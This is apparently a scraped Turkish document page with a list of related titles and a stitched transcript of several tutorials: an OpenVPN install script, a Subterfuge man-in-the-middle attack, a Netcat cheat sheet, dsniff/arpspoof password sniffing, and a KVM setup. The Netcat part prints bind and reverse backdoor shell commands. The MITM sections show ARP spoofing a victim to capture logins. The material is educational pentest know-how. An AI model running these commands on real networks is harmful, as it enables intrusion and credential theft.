Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Benzer belgeler
Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Yum ile Paket Yönetimi

TCP/IP. TCP (Transmission Control Protocol) Paketlerin iletimi. IP (Internet Protocol) Paketlerin yönlendirmesi TCP / IP

HUAWEI Cihazlara Erişim Yöntemleri

LİNUX İŞLETİM SİSTEMİNİN KÖPRÜ MODUNDA ÇALIŞTIRILMASI VE GÜVENLİK DUVARI İŞLEMLERİ

Web Servis-Web Sitesi Bağlantısı

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat

Hızlı Kurulum ve Yapılandırma Kılavuzu

Kurumsal Güvenlik ve Web Filtreleme

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

BEUN VPN Hizmeti. VPN Nedir?

KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI

Kurumsal Güvenlik ve Web Filtreleme

Program Kurulum. Turquaz Muhasebe. İçindekiler

3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2. İçerik. IP ICMP MAC Tracert

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

Subnet A da bulunan DHCP Server makinesinin ve client makinenin IP yapılandırması aşağıdaki gibidir.

WAMP SERVER KURULUMU

Anti-Virüs Atlatma 3. Kurulum

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

Free Cooling (Tibbo Ethernet Modüllü)

INTERNET BAĞLANTISININ KURULMASI İÇİN GEREKLİ YÖNLENDİRİCİ AYARLARI

Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan

Erişim Noktası Ayarları

Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine)

CYGWIN KURULUMU ve KULLANIMI

Anti-Virüs Atlatma 2. Kurulum

INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU

P-TECH RF MODEM İLE MODBUS TCP HABERLEŞME

vsphere Client(viClient) ile ESXI Kontrolü

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

Windows Server 2012 Active Directory Kurulumu

AntiKor Güvenlik Sunucumu nereye yerleştirmeliyim?

KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2

Kamuda Çalışanların Sosyal

UBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

Kabuk Programlama (Bash)

Windows Server 2012 DHCP Kurulum ve Yapılandırma

FTP ve Güvenlik Duvarları

BIND ile DNS Sunucu Kurulumu

"Kendi Bağlantım" İle Kendi VPN Sunucunuzu Kurun

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?

BLGM 354 DENEY 1 * GİRİŞ

Clonezilla Server ile Ağ Üzerinden Çoklu İmaj Yükleme

MCR02-AE Ethernet Temassız Kart Okuyucu

Açık Kod VPN Çözümleri: OpenVPN. Huzeyfe ÖNAL

Ağ Nedir? Birden fazla bilgisayarın iletişimini sağlayan printer vb. kaynakları, daha iyi ve ortaklaşa kullanımı sağlayan yapılara denir.

EC-485. Ethernet RS485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri

WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA

WiFi RS232 Converter Sayfa 1 / 12. WiFi RS232 Converter. Teknik Döküman

Computer Networks 5. Öğr. Gör. Yeşim AKTAŞ Bilgisayar Mühendisliği A.B.D.

Güvenlik Araçları. Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak.

Kurulumdan sonra direk sunucunuzun ip adresini web tarayıcınıza girerseniz apachenin çalıştığına dair "It works" mesajını görebilirsiniz.

7/24 destek hattı Kolay kurulum CD si Üç yıl garanti Üç yıl garanti YM.WR.5341.UM.TR.D01REV

e-imzatr Kurulum Klavuzu

Smoothwall URL Filter Kurulumu

Kolay Kurulum Kılavuzu

e-imzatr Kurulum Klavuzu

EC-100. Ethernet RS232/422/485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti

Virtual Router Redundancy Protocol (VRRP)

Yrd. Doç. Dr. A. Burak İNNER

Vitel. Manage Engine. Opmanager Yönetici Özeti

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Hot Standby Router Protocol (HSRP)

Giriş. İş Ortamlarına Yerleşimi. SecurityOnion Nedir? SecurityOnion İndirme Adresi. SecurityOnion Kurulumu. Kurulum Sonrası Yapılandırma

Bilgi ve İletişim Teknolojileri (JFM 102) Ders 7. LINUX OS (Sistem Yapısı) BİLGİ & İLETİŞİM TEKNOLOJİLERİ. LINUX Yapısı

Ev Kullanıcıları İçin KVM

e-imzatr Kurulum Klavuzu

Ağ Projektörü Çalıştırma Kılavuzu

İÇERİK YÖNETİM SİSTEMİ (CMS) Bir web sitesi yayınlamak için yapılması gerekenler:

Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe

-D delete : Zinciri silmek için kullanılan komut; Silme işlemi için ya zincir numarası belirtilir ya da kuralın kendisi.

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız.

SparkleShare. Çağrı Emer. Ekim, 2011

Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.

Scream! e gelen veri akışlarından bazılarını diğer bir kurum yada bilgisayarla paylaşmak için kullanılabilir.

Bilgi ve Olay Yönetim Sistemi

FOG SERVER (FREE GHOST SERVER) YAZILIMININ KURULUMU

XSS Exploitation via CHEF

Windows 7 - IIS 7.5 üzerine PHP ve MySQL kurulumu

Serdar SEVİL. TCP/IP Protokolü

Elbistan Meslek Yüksek Okulu Güz Yarıyılı

BİLGİSAYAR AĞLARI VE İLETİŞİM

Kampüs Ağlarında Köprü-Güvenlik Duvarı (Bridge Firewall) ve Transparent Proxy

WDS İle Windows XP Pro Image Alma Ve Yükleme Ilbey Ismail UNVER - MCP

MaestroPanel Kurulum

TÜRKİYE NOTERLER BİRLİĞİ

Vpn nedir? VPN Nedir?

CHAPTER 9. DHCP Server

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

İSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ. Öğr.Gör. Mehmet DEMİR

VMware 4.0 vcenter Server Kurulumu

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği

Transkript:

Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların sunucularında duran logların başkalarına verilmediğini veya trafiğinizin ne kadar güvende olduğunu bilemezsiniz. Bu yüzden bu yazıda kendi server ımıza OpenVPN kurulumunu kısaca yazacağım. (Ben DigitalOcean dan kiraladığım VPS ime Debian 7.0 x64 kurdum ama Ubuntu ve CentOS ta da çalışır.) OpenVPN kurulumu ile ilgili yazılar aradığınızda (How to install openvpn on blabla) çokca uzun ve kurarken canınızdan bezmenize neden olabilecek bir ton olay göreceksiniz. Bunun böyle olduğunun farkına varanlar sağolsunlar işi bir bash script yazarak halletmişler. Ki bunu Github ta forklayan da 300 ün üstünde kişi var, yani OpenVPN den biz çektik siz çekmeyin diyip geliştirmeye yardım etmişler. Kurulum Önce sistemimize update & upgrade yapıyoruz. apt-get update && apt-get upgrade Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada. Sağolsunlar yazdıkları küçük bir komut zinciri ile Github a uğramamızada gerek kalmıyor. wget git.io/vpn --no-check-certificate -O openvpn-install.sh; bash openvpn-install.sh Bu satırı komut satırımıza girdiğimizde bash scripti indirip

çalıştıracak ve bize server IP imizi soracak. Kendisi zaten IP adresimizi bulduktan sonra soruyor, teyit ettirmek için yani. Sonrasında OpenVPN için hangi porttan dinleme yapacağını soruyor. Buraya da OpenVPN için default port numarası olan 1194 değerini girip bize soruyor. Bunu herhangi bir değere set edebilirsiniz. Sonrasında sorduğu soruları uzatmadan enterlayıp geçiyoruz ki kendisi defaultta n vermiş. Sonrasında hangi DNS i kullanmak istediğinizi soruyor. Sistemin kullandığı DNS i kullanmasını söyleyip 1 diyoruz. Ardından gerekli ayarlamaları yaptığı sırada bağlanacağımız client için bir isim soruyor. Default olarak client denmiş. Ben bunu Gundy olarak değişiriyorum ve geçiyorum.

Sonrasında konfigürasyonlar için alacağı bilgileri bitirdi ve bizden devam için bir tuşa basmamızı istiyor. Ve önce kurulum, ardından konfigürasyonları yapıyor. Bunlardan biri bağlanmamız için gereken 2048 bitlik RSA Private Key. Anahtarı ürettikten sonra servisleri yeniden başlatacaktır ve kullanıma hazır hale gelecektir. Windows makinemizden OpenVPN client ıyla bağlandığımız sırada kullanacağımız gerekli bilgileri içeren konfigürasyon dosyası ana dizinimizde, ayarlamalar sırasında belirttiğimiz kullanıcı ismimizle oluşturulmuş ve bizi bekliyor. WinSCP veya benzeri bir uygulama ile server dan ovpn uzantılı dosyamızı çekiyoruz. Bu dosyayı OpenVPN in kurulu olduğu

dizindeki config klasörünün altına atıp OpenVPN istemcimizi çalıştırıyoruz. Yönetici olarak çalıştırmayı unutmayın! Tabi çalıştırdığımız zaman küçük bir ikon haline gelip görev çubuğunda görünüyor.sağ tıklayıp Bağlan diyoruz ve bağlantının oluşturulmasını bekliyoruz. Ardından bağlantıyı sağlamaya çalışıyor TLS paketleri yollayıp alıyor.

Ve bağlantı kurulduğu zaman bize bağlandığımız network ten atanan IP ile beraber bildiren bir uyarı çıkıyor. (Yapacaklarınız bekleme süresiyle beraber 3-5 dakika.) Subterfuge ile Man in The

Middle Attack Man in the middle saldırıları, saldırganın hedefindeki bilgisayarla diğer bilgisayar veya bilgisayarların ağdaki tüm veri trafiğini kendi üzerine alması yoluyla yaptığı saldırı tipidir.bu tür bir saldırıyı yapmak için temel düzeyde Layer 2 (Physical Layer) ve Layer 3 bilgisi yeterlidir. Layer 2, Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır. Layer 3, Network Katmanı, işte bu katman ip lerden oluşur, ip blokları ile tanımlanmış ağlar arasındaki veri iletişimi bu katmanda sağlanır. Layer 2 de çalışan switch mantığı; Switch herhangi bir porttan gelen bir ağ paketini alır. Aldığı paketin mac adresi anahtarın mac adres tablosu nda yoksa bunu mac adres tablosuna ekler. Aldığı paketin hedef mac adresini kendi mac adres tablosunda arar, eğer kendi mac adres tablosunda var ise bu paketi ilgili porttan gönderir. Eğer yoksa hiç bir şey yapmaz. (Drop edilir.) Not: Mac adres tablosu, mac adreslerini anahtarın portları ile ilişkilendirildiği tablodur. Bu tablo ile hangi mac adresine

anahtarın hangi fiziksel hangi portundan ulaşılabildiğine bakılabilir. Bazen arp tablosu ile karıştırılabilir, arp tablosu mac adreslerinin ipler ile ilişkilendirildiği tablodur. Mac Adres Tablosu 00:00:00:00:AA:AA FastEthernet 0/0 00:00:00:00:BB:BB FastEthernet 0/0 00:00:00:00:CC:CC FastEthernet 0/1 Arp Tablosu 00:00:00:00:AA:AA 192.168.1.1 00:00:00:00:BB:BB 192.168.1.2 00:00:00:00:CC:CC 192.168.1.3 Peki örneğin 192.168.1.3 ip li bilgisayar, 192.168.1.2 ip li bir bilgisayar ile iletişimi geçmek isterse ne yapar? Layer 2 de bilgisayarlar birbirleri ile iletişime geçmek için mac adreslerini kullanırlar, IP ler ise Layer 3 te işimize yarar. Yani aynı ağdaki 2 bilgisayar iletişime geçmek için birbirlerinin mac adreslerini bilmek zorundadırlar. Sorunun cevabına gelince; 192.168.1.3 ipli bilgisayar kendi arp tablosuna bakar, 192.168.1.2 ipli bilgisayar arp tablosunda varsa arp time out süresi içinde zaten bu bilgisayar ile bir iletişime geçilmiş demektir. Eğer yok ise bu bilgisayar ile henüz bir görüşme sağlanmamış demektir yani bağlantı için ilk adıma geçilir. Bu da arp request broadcast paketini göndermekle başlar. Arp request paketi ağdaki tüm bilgisayarlara iletilir ve sorar 192.168.1.2 kim? 192.168.1.2, bu arp sorusuna benim diye cevap verir ve bu cevabın içinde de kendi mac adresi vardır. 192.168.1.2 den gelen cevabı alan 192.168.1.3 ipli bilgisayar artık 192.168.1.2 ipli bilgisayarın mac adresini biliyor, yani onunla iletişime geçmek için yeterli bilgisi var.

Göndermek istediği paketin kaynak mac adresine kendi mac adresini, hedef mac adresinin yerine ise 192.168.1.2 ipli bilgisayarın mac adresini ekleyerek paketi gönderir. Tam bu noktada eğer biz 192.168.1.3 ü yanıltır ve 192.168.1.2 nin mac adresi o değil bu diyerek kendi mac adresimizi yazarsak ne olur? Paket bize gönderilir. Peki, aynı paketi alıp 192.168.1.2 ye biz göndersek ve yanıt bize gelse bizde aldığımız cevabı tekrar 192.168.1.3 e gönderirsek ne olur? 192.168.1.3 ün 192.168.1.2 e gönderdiği tüm verileri kendi üzerimize almış oluruz ve eğer 192.168.1.2 bu ağda internete çıkmak için kullanılan modem, router, proxy veya benzeri bir cihaz ise 192.168.1.3 ün bütün internet faaliyetleri bizim kontrolümüz dahilinde gerçekleşir. Subterfuge ile MITM ın nasıl yapıldığını görelim > SETUP (Kurulum) Kali makinasında Subterfuge un en son sürümünü indiriyoruz; $ wget https://subterfuge.googlecode.com/files/subterfuge_1.0-1_all.d eb Komutu yazarak yükleme işlemi yapıyoruz; $ dpkg -i subterfuge_1.0-1_all.deb Subterfuge a bağlı olan şeyler var ise onları da update ediyoruz. $ apt-get update && apt-get -f install Subterfuge u çalıştırıyoruz. $ subterfuge

Sonra tarayıcımızdan 127.0.0.1 e giderek Subterfuge arayüzüne ulaşıyoruz. Arayüzde Settings kısmına tıklıyoruz ve ekrandaki ayarlamaları yapıyoruz. Sonrasında MITM Vectors istediğimiz adresini yazıyoruz. sekmesine tıklayarak zehirlemek IP

Sonra Modules sekmesine tıklayarak Network View e tıklıyoruz ve Apply tuşuna basıyoruz. IP adresi 192.168.4.67 olan kurban (victim) Linux makinayı görüyoruz. Burada Scan tuşu ile açık olan portları görebiliriz. Kontrol etmek istediğimiz saldırı türünüde istersek Controls kısmındaki simgelerden(http Injection,DoS Attack vs.) gerçekleştirebiliriz.kurban bilgisayardaki kişi eğer login olarak herhangi bir yere giriş yapıyor ise o bilgiler bizim elimize ulaşmış oluyor.

Siteye yaptığı girişin session bilgileri de elimize ulaşıyor. Mesela kurban bir siteye giriş yapsın. Ve bu bilgiler, log in tuşuna bastıktan sonra bizim Subterfuge ekranımıza düşmüş oluyor. Bu şekilde router ve kurban bilgisayar arasında MITM saldısını gerçekletirmiş oluyoruz. Netcat Kullanımı Bu doküman, Netcat in hem Linux hem de UNIX sistemlerdeki çeşitli kullanım şekillerinden bahsetmektedir. Temel Kullanım : Basit Netcat Istemci #nc [Hedef IP] [Port] Vermiş olduğunuz hedef IP nin yine vermiş olduğunuz porta bağlantı kurar. Basit Netcat Dinleyici #nc l p [localport] Yerelde verdiğiniz portta Netcat dinleyici kurar.

Netcat Komutları #nc [options] [Hedef IP Adresi] [port/lar] [Hedef IP Adresi] kısmı basit olarak karşı tarafın IP adresi ya da domain adıdır. -l : Listen mod ( dinleme modu ) (varsayılan olarak istemci moddadır) -L : Listen harder (yalnızca Netcat in Windows versiyonu için desteklidir. Bir istemci bağlantısı koptuktan sonra tekrar dinlemeyi otomatik başlatmak amacıyla Netcat e kalıcı bağlantı sağlar.) -u : UDP mod (varsayılan TCP) -p istemci : Yerel port (Dinleme modunda bu port dinlenir, modda ise bütün paketlerin gönderildiği kaynak porttur.) -e : Kurulan bağlantıdan sonra program çalıştırmaya yarar. n : DNS sorgusu yapmaması için kullanılır. -z : Zero I/O mod (Hiçbir very göndermez) -wn :Bağlantı timeout, STDIN kapandıktan sonra N saniye bekler.bir Netcat istemci veya dinleyici bu komut ile bağlantı kurması için N sn bekler. Eğer bu süre zarfında bağlantı gerçekleşmezse Netcat çalışmayı durdurur. -v :Ayrıntılı modu. Meydana gelen Standart Error hatayı ekrana yazdırır. -vv :Daha Ayrıntılı modu. Standart Error hakkında daha fazla ayrıntı yazdırır. Netcat Windows Kullanımı : İstemci den Dinleyici ye Aktarım

C: \> echo nc [Hedef IP] [Hedef Port] > deneme.bat C: \> nc l p [YerelPort] e deneme.bat YerelPort dan Hedef IP nin Hedef Portuna kurulan bağlantı ile paketler gönderilir. Dinleyici-Dinleyici Aktarım C: \> echo nc l p [YerelPort2] > deneme.bat C: \> nc l p [YerelPort1] e deneme.bat YerelPort1 de kurulan bir bağlantı ile YerelPort2 ye paket gönderimi şeklinde bir aktarım oluşturulur. İstemci-İstemci Aktarım C: \> echo nc [Sonraki IP] [Port 2] > deneme.bat C: \> nc [Önceki IP] [Port 1] -e deneme.bat Önceki IP nin Port 1 inden Sonraki IP nin Port 2 sine paket gönderimi ile aktarım olur. Dosya Transferi İstemciden Dinleyiciye Dosya Gönderme #nc l p [Yerel Port] > [giden dosya] Yerel Port dinlenir ve giden dosya çıktısı yüklenir. #nc w3 [Hedef IP] [Hedef Port] < [gelen dosya] gelen dosya Hedef IP nin Hedep portuna push edilir. Dinleyici den İstemci ye Dosya Çekmek #nc l p [Yerel Port] < [gelen dosya] Yerel Port dinlenir ve gelen dosya push etmeye hazırlanır. #nc w3 [Hedef IP] [Hedef Port] > [giden dosya]

Hedef IP nin Hedef Portu ile bağlantı kurulur ve giden dosya çekilir. TCP Port Tarayıcı IP Adresin Port Taraması #nc v n z w1 [Hedef IP] [Başlangıç portu]-[bitiş portu] Belirtilen port aralığında hedef IP ye n (isimleri çözmeden) z (herhangi bir data göndermeden) w1 Bağlantı kurmak için 1 sn den daha fazla beklemeden port taraması gerçekleştirme işlemine başlar. TCP Banner Grabber Linux IP adresine üzerinde çalışan TCP servislere Banner Grabbing #echo nc v n w1 [Hedef IP] [baş. port]- [bitiş Port] Backdoor Shell Linux da backdoor shell dinleme #nc l -p [Yerel Port] e /bin/bash Windows da backdoor shell dinleme C: \> nc l p [Yerel Port] e cmd.exe Tersine backdoor shell dinleme (Linux) # nc [Senin IP adresin] [port] e /bin/bash Tersine backdoor shell dinleme (Windows) C: \> nc [Senin IP adresin] [port] e cmd.exe

OS X Dsniff Kullanımı Dsniff nedir? Bu program gelişmiş bir şifre sniffer dır. Birçok protokolü tanır, TELNET, FTP, SMTP, Post Office Protocol (POP), Internet Message Access Protocol (IMAP), HTTP, CVS, Citrix, Server Message Block (SMB), Oracle ve daha fazlasını içerir.diğer sniffer lar gibi değildir, örneğin Wireshark tekil paketler ve bağlantı hakkında çok fazla ve detaylı bilgi verir eğer sizin tek istediğiniz şifre ve kullanıcı adı ise dsniff kullanabilirsiniz. Ayrıca bu kurulumla yüklenecek araçlar: Filesnarf, Mailsnarf, Msgsnarf, Urlsnarf, ve Webspy,Arpspoof 1. Komut satırına öncellikle aşağıdaki komutu yazıyoruz. xcode-select install Öncellikle yukarıdaki komut ile eksik araçlarını yüklemeniz gerekmektedir. olan geliştirici OS X Dsniff Kurulumu: 1. MacPorts un size uygun olan versiyonunu indirin ve kurun. (MacPorts İndir) 2. Terminal açın ve aşağıdaki kodu çalıştırın> port install dsniff Dsniff ile Man in the Middle Attack: Uygulayacağımız Adımlar > 1. 1.İP Yönlendirme: OSx için: sudo sysctl -w net.inet.ip.forwarding=1 Linux için: echo 1 > /proc/sys/net/ipv4/ip_forward

1. 2.Arpspoofing. 2. İki tane terminal açın ve aşağıdaki komutları ayrı ayrı çalıştırınız. 1.Terminal için: arpspoof -i en0 -t KurbanIP BizimIP 2.Terminal için: arpspoof -i en0 -t BizimIP KurbanIP 1. 3.Dsniff ile Şifre ve Kullanıcı adlarını çekmek: 2. A ş a ğ ı d a k i K o m u t i l e o t o m a t i k o l a r a k K u r b a n ı n Bağlantılarını dinleyerek sizin için şifre ve kullanıcı adını çekecektir. dsniff -i en0 Not: İnterface kısmına en0 OSx için yazdım siz linux kullanıyorsanız eth0 yapmalısınız, bilgisayarınızın ethernet card ına göre değişir. KVM nedir? Nasıl kurulur? En basit tanımıyla KVM Çekirdek Makina (Kernel Based Virtual Machine) dır. Temelli Sanal Yurt dısı veya içinden satın alacağız VPS makinelerinin kurulu olduğu fiziksel makinelerin bir çoğu da alt yapı olarak kvm kullanmaktadır. Normalde VmWare,Virtualbox ile yaptığımız sanallaştırmanın nesi vardı da çıktı bu KVM? Küçük bir araştırma yaptıktan sonra bu soruya cevap bulmak çok da zor olmasa gerek. KVM ile sanallaştırma kernel seviyesine inmiştir. Önceden

işletim sistemi sistemi üzerinde bir uygulama gibi çalışan VMWare gibi sanallaştırma çözümlerinin yavaş olması ve pek çok konuda ana işletim sistemine muhtaç olması istenmeyen bir durumla kullanıcıyı yüz yüze bırakmaktadır. Hypervisor gibi teknolojiler ile bazı sorunların üstesinden gelmeye çalışsalar da bu çözümler başka sorunları da ortaya çıkarmıştır. Geliştirilen KVM ile bu konularda önemli adımlar atılmıştır. Kvm ile sanal makinanın hızı neredeyse ana makinadaki işletim sisteminin hızı ile aynıdır. Kernel düzeyinde bir sanallaştırma sadece ekonomik olarak değil,güvenlik ve süreklilik gibi konularda da kullanıcı dostu bir sanal işletim sistemi sunmaktadır. Bilgisayarın tüm donanım haklarına erişebilen bir yapı tabi ki oldukça güçlüdür.yani VMware gibi sizin bir malikane sahibi olduğunuzu varsayıp o malikenin sadece bir odasını kullandırmak yerine size malikaneyi vaadediyor. Nasıl Kurarım? Öncelikle kuruluma başlamadan önce bilgisayarımızda BIOS ayarlarına girip anakarttımızın virtualisation özelliğinin enabled olmasına dikkat edelim ki benim gibi tüm gün neden hata veriyor bu program demeyelim.:) 1.Benim işlemcim sanal makine için yeterli mi? Sizde takdir edersiniz ki tek çekirdekli bir makineye sanal makine kurmak pek de önerilen birşey değil(kurabilen varsa beri gelsin).peki benim makinem kaç cekirdek CPU durumu ne sorusuna cevap alacağımız aşağıdaki komutu giriyoruz. egrep (vmx svm) color=always /proc/cpuinfo grep vmx Bu komutun cıktısında birden fazla sayıda vmx yazısı görüyor iseniz kullandığınız cihaz sanallaştırma için uygun demektir. 2.Kurulum Bu post kvmnin ubuntu ve debian sistemlere nasıl kurulacağını

anlattığından apt kullanıyor olacağız.aşağıdaki gerekli paketlerin kurulumunu yapıyoruz. komutla apt-get install qemu-kvm libvirt-bin bridge-utils virtmanager virtinst kvm 3.Gerekli Kullanıcı ve grupların eklenmesi Şimdi kendimizi programı kullanacak kullanıcı ekliyoruz. Misal ben kendi bilgisayarımda kullanıcısıyım.vereceğim komut adduser dimakoci adduser dimakoci libvirtd(debian olarak dimakoci sistemlerinde burada vermemiz gereken komut adduser dimakoci libvirt) adduser dimakoci kvm Bu adımlardan sonra sistemden log out olup tekrar giriş yapmamız gerekmekte. 4.Adım Kontrol Bu aşamaya gelmeden önce yukarıdaki adımları eksiksiz olarak yaptınız ve herhangi bir hata almadınız ise kvm yi sisteminize kurmuşsunuz demektir.şimdi kontrol edelim.sistemin kurulup kurulmadığını anlamamızın bir çok yolu vardır.ben tek aşamada aşağıdaki kodu kullanarak bu işi yapıyorum. virsh -c qemu:///system list Ayrıca virsh ve akabinde list komutu vererek de aynı işlemi yapmış olursunuz. Bu aşamadan sonra Kvm kullanıma hazır.isterseniz terminalden virt-manager yazarak,isterseniz menu>system>virtual machine manager a tıklayarak çalıştırabilirsiniz